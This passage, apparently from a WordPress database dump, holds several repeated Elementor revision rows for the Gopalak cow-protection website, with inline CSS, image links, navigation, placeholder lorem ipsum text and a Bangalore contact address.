.elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-12 12:47:27','2022-10-12 07:17:27','',1373,'https://gopalak.in/?p=1666',0,'revision','',0),(1667,1,'2022-10-12 12:47:27','2022-10-12 07:17:27','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-12 12:47:27','2022-10-12 07:17:27','',1373,'https://gopalak.in/?p=1667',0,'revision','',0),(1668,1,'2022-10-12 12:47:58','2022-10-12 07:17:58','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-12 12:47:58','2022-10-12 07:17:58','',1373,'https://gopalak.in/?p=1668',0,'revision','',0),(1669,1,'2022-10-12 12:47:58','2022-10-12 07:17:58','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-12 12:47:58','2022-10-12 07:17:58','',1373,'https://gopalak.in/?p=1669',0,'revision','',0),(1670,1,'2022-10-12 12:47:58','2022-10-12 07:17:58','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img 